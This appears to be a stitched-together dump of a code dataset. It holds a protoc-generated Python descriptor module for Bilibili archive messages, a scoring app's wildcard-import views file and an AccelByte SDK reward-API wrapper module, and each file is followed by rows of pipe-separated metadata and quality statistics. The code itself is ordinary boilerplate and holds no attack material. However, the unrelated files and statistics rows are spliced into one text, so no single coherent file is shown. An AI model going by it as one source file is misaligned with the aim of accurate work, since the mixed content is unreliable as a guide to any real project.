_descriptor.FieldDescriptor(
name='from', full_name='bilibili.app.archive.v1.Page.from', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='part', full_name='bilibili.app.archive.v1.Page.part', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='duration', full_name='bilibili.app.archive.v1.Page.duration', index=4,
number=5, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vid', full_name='bilibili.app.archive.v1.Page.vid', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='desc', full_name='bilibili.app.archive.v1.Page.desc', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='webLink', full_name='bilibili.app.archive.v1.Page.webLink', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dimension', full_name='bilibili.app.archive.v1.Page.dimension', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=860,
serialized_end=1038,
)
_RIGHTS = _descriptor.Descriptor(
name='Rights',
full_name='bilibili.app.archive.v1.Rights',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='bp', full_name='bilibili.app.archive.v1.Rights.bp', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='elec', full_name='bilibili.app.archive.v1.Rights.elec', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='download', full_name='bilibili.app.archive.v1.Rights.download', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='movie', full_name='bilibili.app.archive.v1.Rights.movie', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pay', full_name='bilibili.app.archive.v1.Rights.pay', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='hd5', full_name='bilibili.app.archive.v1.Rights.hd5', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='noReprint', full_name='bilibili.app.archive.v1.Rights.noReprint', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autoplay', full_name='bilibili.app.archive.v1.Rights.autoplay', index=7,
number=8, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ugcPay', full_name='bilibili.app.archive.v1.Rights.ugcPay', index=8,
number=9, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='isCooperation', full_name='bilibili.app.archive.v1.Rights.isCooperation', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ugcPayPreview', full_name='bilibili.app.archive.v1.Rights.ugcPayPreview', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='noBackground', full_name='bilibili.app.archive.v1.Rights.noBackground', index=11,
number=12, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1041,
serialized_end=1255,
)
_STAFFINFO = _descriptor.Descriptor(
name='StaffInfo',
full_name='bilibili.app.archive.v1.StaffInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='mid', full_name='bilibili.app.archive.v1.StaffInfo.mid', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='title', full_name='bilibili.app.archive.v1.StaffInfo.title', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='attribute', full_name='bilibili.app.archive.v1.StaffInfo.attribute', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1257,
serialized_end=1315,
)
_STAT = _descriptor.Descriptor(
name='Stat',
full_name='bilibili.app.archive.v1.Stat',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='aid', full_name='bilibili.app.archive.v1.Stat.aid', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='view', full_name='bilibili.app.archive.v1.Stat.view', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='danmaku', full_name='bilibili.app.archive.v1.Stat.danmaku', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='reply', full_name='bilibili.app.archive.v1.Stat.reply', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='fav', full_name='bilibili.app.archive.v1.Stat.fav', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='coin', full_name='bilibili.app.archive.v1.Stat.coin', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='share', full_name='bilibili.app.archive.v1.Stat.share', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='nowRank', full_name='bilibili.app.archive.v1.Stat.nowRank', index=7,
number=8, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='hisRank', full_name='bilibili.app.archive.v1.Stat.hisRank', index=8,
number=9, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='like', full_name='bilibili.app.archive.v1.Stat.like', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dislike', full_name='bilibili.app.archive.v1.Stat.dislike', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1318,
serialized_end=1490,
)
_ARC.fields_by_name['rights'].message_type = _RIGHTS
_ARC.fields_by_name['author'].message_type = _AUTHOR
_ARC.fields_by_name['stat'].message_type = _STAT
_ARC.fields_by_name['dimension'].message_type = _DIMENSION
_ARC.fields_by_name['staffInfo'].message_type = _STAFFINFO
_PAGE.fields_by_name['dimension'].message_type = _DIMENSION
DESCRIPTOR.message_types_by_name['Arc'] = _ARC
DESCRIPTOR.message_types_by_name['Author'] = _AUTHOR
DESCRIPTOR.message_types_by_name['Dimension'] = _DIMENSION
DESCRIPTOR.message_types_by_name['Page'] = _PAGE
DESCRIPTOR.message_types_by_name['Rights'] = _RIGHTS
DESCRIPTOR.message_types_by_name['StaffInfo'] = _STAFFINFO
DESCRIPTOR.message_types_by_name['Stat'] = _STAT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Arc = _reflection.GeneratedProtocolMessageType('Arc', (_message.Message,), {
'DESCRIPTOR' : _ARC,
'__module__' : 'bilibili.app.archive.v1.archive_pb2'
# @@protoc_insertion_point(class_scope:bilibili.app.archive.v1.Arc)
})
_sym_db.RegisterMessage(Arc)
Author = _reflection.GeneratedProtocolMessageType('Author', (_message.Message,), {
'DESCRIPTOR' : _AUTHOR,
'__module__' : 'bilibili.app.archive.v1.archive_pb2'
# @@protoc_insertion_point(class_scope:bilibili.app.archive.v1.Author)
})
_sym_db.RegisterMessage(Author)
Dimension = _reflection.GeneratedProtocolMessageType('Dimension', (_message.Message,), {
'DESCRIPTOR' : _DIMENSION,
'__module__' : 'bilibili.app.archive.v1.archive_pb2'
# @@protoc_insertion_point(class_scope:bilibili.app.archive.v1.Dimension)
})
_sym_db.RegisterMessage(Dimension)
Page = _reflection.GeneratedProtocolMessageType('Page', (_message.Message,), {
'DESCRIPTOR' : _PAGE,
'__module__' : 'bilibili.app.archive.v1.archive_pb2'
# @@protoc_insertion_point(class_scope:bilibili.app.archive.v1.Page)
})
_sym_db.RegisterMessage(Page)
Rights = _reflection.GeneratedProtocolMessageType('Rights', (_message.Message,), {
'DESCRIPTOR' : _RIGHTS,
'__module__' : 'bilibili.app.archive.v1.archive_pb2'
# @@protoc_insertion_point(class_scope:bilibili.app.archive.v1.Rights)
})
_sym_db.RegisterMessage(Rights)
StaffInfo = _reflection.GeneratedProtocolMessageType('StaffInfo', (_message.Message,), {
'DESCRIPTOR' : _STAFFINFO,
'__module__' : 'bilibili.app.archive.v1.archive_pb2'
# @@protoc_insertion_point(class_scope:bilibili.app.archive.v1.StaffInfo)
})
_sym_db.RegisterMessage(StaffInfo)
Stat = _reflection.GeneratedProtocolMessageType('Stat', (_message.Message,), {
'DESCRIPTOR' : _STAT,
'__module__' : 'bilibili.app.archive.v1.archive_pb2'
# @@protoc_insertion_point(class_scope:bilibili.app.archive.v1.Stat)
})
_sym_db.RegisterMessage(Stat)
# @@protoc_insertion_point(module_scope)
| 51.312418 | 3,191 | 0.741453 | 5,436 | 39,254 | 5.07947 | 0.055004 | 0.06374 | 0.098399 | 0.073881 | 0.861908 | 0.83279 | 0.818666 | 0.736383 | 0.719325 | 0.714544 | 0 | 0.04714 | 0.128318 | 39,254 | 764 | 3,192 | 51.379581 | 0.759827 | 0.018138 | 0 | 0.745833 | 1 | 0.001389 | 0.183907 | 0.159429 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.005556 | 0 | 0.005556 | 0.002778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
76793e22552c612ee43e92061b97561ea83bb285 | 1,431 | py | Python | scoring/views/__init__.py | alextenczar/3-julian-alex | 9f2aa71769dd6eb6e7dd9e63236c3e7874f02de7 | [
"MIT"
] | null | null | null | scoring/views/__init__.py | alextenczar/3-julian-alex | 9f2aa71769dd6eb6e7dd9e63236c3e7874f02de7 | [
"MIT"
] | 3 | 2021-06-09T19:34:38.000Z | 2022-02-10T12:25:27.000Z | scoring/views/__init__.py | alextenczar/3-julian-alex | 9f2aa71769dd6eb6e7dd9e63236c3e7874f02de7 | [
"MIT"
] | null | null | null | from scoring.views.home import *
from scoring.views.display.display_judges import *
from scoring.views.display.display_projects import *
from scoring.views.display.display_students import *
from scoring.views.display.display_judge_assignments import *
from scoring.views.display.display_scoring import *
from scoring.views.import_m.import_data import *
from scoring.views.import_m.import_file import *
from scoring.views.import_m.import_project import *
from scoring.views.import_m.import_student import *
from scoring.views.import_m.import_judge_assignment import *
from scoring.views.calc_sort.cal_average_score import *
from scoring.views.calc_sort.cal_avg_01 import *
from scoring.views.calc_sort.cal_avg_z_score import *
from scoring.views.calc_sort.cal_isef_score import *
from scoring.views.calc_sort.cal_scaled_rank import *
from scoring.views.calc_sort.cal_scaled_score import *
from scoring.views.calc_sort.cal_scaled_z_score import *
from scoring.views.calc_sort.cal_z_score import *
from scoring.views.calc_sort.calculate_scores import *
from scoring.views.calc_sort.sort_avg_01_rank import *
from scoring.views.calc_sort.sort_category_rank import *
from scoring.views.calc_sort.sort_isef_rank import *
from scoring.views.calc_sort.sort_judge_rank import *
from scoring.views.calc_sort.sort_rank import *
from scoring.views.calc_sort.sort_z_score_rank import *
from scoring.views.export_judge_assignment import *
| 42.088235 | 61 | 0.846261 | 226 | 1,431 | 5.066372 | 0.141593 | 0.259389 | 0.377293 | 0.499563 | 0.838428 | 0.815721 | 0.658515 | 0.443668 | 0.144978 | 0 | 0 | 0.003037 | 0.079665 | 1,431 | 33 | 62 | 43.363636 | 0.866363 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
769fd52caf95a3967688f65c955363602f6311d2 | 13,849 | py | Python | accelbyte_py_sdk/api/platform/wrappers/_reward.py | AccelByte/accelbyte-python-sdk | dcd311fad111c59da828278975340fb92e0f26f7 | [
"MIT"
] | null | null | null | accelbyte_py_sdk/api/platform/wrappers/_reward.py | AccelByte/accelbyte-python-sdk | dcd311fad111c59da828278975340fb92e0f26f7 | [
"MIT"
] | 1 | 2021-10-13T03:46:58.000Z | 2021-10-13T03:46:58.000Z | accelbyte_py_sdk/api/platform/wrappers/_reward.py | AccelByte/accelbyte-python-sdk | dcd311fad111c59da828278975340fb92e0f26f7 | [
"MIT"
] | null | null | null | # Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: justice_py_sdk_codegen/__main__.py
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from typing import Any, Dict, List, Optional, Tuple, Union
from ....core import HeaderStr
from ....core import get_namespace as get_services_namespace
from ....core import run_request
from ....core import run_request_async
from ....core import same_doc_as
from ..models import ConditionMatchResult
from ..models import ErrorEntity
from ..models import EventPayload
from ..models import RewardCreate
from ..models import RewardInfo
from ..models import RewardPagingSlicedResult
from ..models import RewardUpdate
from ..models import ValidationErrorEntity
from ..operations.reward import CheckEventCondition
from ..operations.reward import CreateReward
from ..operations.reward import DeleteReward
from ..operations.reward import ExportRewards
from ..operations.reward import GetReward
from ..operations.reward import GetReward1
from ..operations.reward import GetRewardByCode
from ..operations.reward import ImportRewards
from ..operations.reward import QueryRewards
from ..operations.reward import QueryRewardsSortByEnum
from ..operations.reward import QueryRewards1
from ..operations.reward import QueryRewards1SortByEnum
from ..operations.reward import UpdateReward
@same_doc_as(CheckEventCondition)
def check_event_condition(reward_id: str, body: Optional[EventPayload] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = CheckEventCondition.create(
reward_id=reward_id,
body=body,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(CheckEventCondition)
async def check_event_condition_async(reward_id: str, body: Optional[EventPayload] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = CheckEventCondition.create(
reward_id=reward_id,
body=body,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(CreateReward)
def create_reward(body: Optional[RewardCreate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = CreateReward.create(
body=body,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(CreateReward)
async def create_reward_async(body: Optional[RewardCreate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = CreateReward.create(
body=body,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(DeleteReward)
def delete_reward(reward_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = DeleteReward.create(
reward_id=reward_id,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(DeleteReward)
async def delete_reward_async(reward_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = DeleteReward.create(
reward_id=reward_id,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ExportRewards)
def export_rewards(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = ExportRewards.create(
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ExportRewards)
async def export_rewards_async(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = ExportRewards.create(
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetReward)
def get_reward(reward_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetReward.create(
reward_id=reward_id,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetReward)
async def get_reward_async(reward_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetReward.create(
reward_id=reward_id,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetReward1)
def get_reward_1(reward_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetReward1.create(
reward_id=reward_id,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetReward1)
async def get_reward_1_async(reward_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetReward1.create(
reward_id=reward_id,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetRewardByCode)
def get_reward_by_code(reward_code: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetRewardByCode.create(
reward_code=reward_code,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetRewardByCode)
async def get_reward_by_code_async(reward_code: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetRewardByCode.create(
reward_code=reward_code,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ImportRewards)
def import_rewards(replace_existing: bool, file: Optional[Any] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = ImportRewards.create(
replace_existing=replace_existing,
file=file,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ImportRewards)
async def import_rewards_async(replace_existing: bool, file: Optional[Any] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = ImportRewards.create(
replace_existing=replace_existing,
file=file,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(QueryRewards)
def query_rewards(event_topic: Optional[str] = None, limit: Optional[int] = None, offset: Optional[int] = None, sort_by: Optional[List[Union[str, QueryRewardsSortByEnum]]] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = QueryRewards.create(
event_topic=event_topic,
limit=limit,
offset=offset,
sort_by=sort_by,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(QueryRewards)
async def query_rewards_async(event_topic: Optional[str] = None, limit: Optional[int] = None, offset: Optional[int] = None, sort_by: Optional[List[Union[str, QueryRewardsSortByEnum]]] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = QueryRewards.create(
event_topic=event_topic,
limit=limit,
offset=offset,
sort_by=sort_by,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(QueryRewards1)
def query_rewards_1(event_topic: Optional[str] = None, limit: Optional[int] = None, offset: Optional[int] = None, sort_by: Optional[List[Union[str, QueryRewards1SortByEnum]]] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = QueryRewards1.create(
event_topic=event_topic,
limit=limit,
offset=offset,
sort_by=sort_by,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(QueryRewards1)
async def query_rewards_1_async(event_topic: Optional[str] = None, limit: Optional[int] = None, offset: Optional[int] = None, sort_by: Optional[List[Union[str, QueryRewards1SortByEnum]]] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = QueryRewards1.create(
event_topic=event_topic,
limit=limit,
offset=offset,
sort_by=sort_by,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(UpdateReward)
def update_reward(reward_id: str, body: Optional[RewardUpdate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = UpdateReward.create(
reward_id=reward_id,
body=body,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(UpdateReward)
async def update_reward_async(reward_id: str, body: Optional[RewardUpdate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = UpdateReward.create(
reward_id=reward_id,
body=body,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
| 38.901685 | 293 | 0.715214 | 1,654 | 13,849 | 5.773882 | 0.078597 | 0.117487 | 0.082932 | 0.055288 | 0.805654 | 0.79623 | 0.795183 | 0.795183 | 0.78534 | 0.78534 | 0 | 0.001872 | 0.189905 | 13,849 | 355 | 294 | 39.011268 | 0.849363 | 0.055311 | 0 | 0.750877 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038596 | false | 0 | 0.115789 | 0 | 0.308772 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
